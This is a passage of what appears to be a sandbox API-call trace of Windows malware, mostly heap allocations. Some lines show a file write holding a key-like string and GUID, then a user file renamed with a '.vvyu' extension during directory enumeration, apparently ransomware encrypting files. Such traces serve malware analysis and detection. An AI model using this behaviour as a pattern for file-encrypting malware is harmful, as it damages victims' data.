Size=0x4) returned 0x29f7e70 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6260 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62c0 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62d8 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6278 [0193.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6248 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0193.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0193.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0193.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0193.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0193.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3cd8 | out: hHeap=0x2c0000) returned 1 [0193.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0193.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0193.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0193.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0193.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0193.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0193.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.020] WriteFile (in: hFile=0x584, lpBuffer=0x30a1f0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x30a1f0*, lpNumberOfBytesWritten=0x2f9fb14*=0xdd, lpOverlapped=0x0) returned 1 [0193.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30a1f0 | out: hHeap=0x2c0000) returned 1 [0193.020] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.020] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0193.022] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.022] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.022] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.022] CloseHandle (hObject=0x584) returned 1 [0193.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0193.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0193.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0193.031] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url.vvyu")) returned 1 [0193.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.033] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.036] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0193.036] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0193.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0193.037] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0193.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0193.037] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0193.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0193.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0193.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 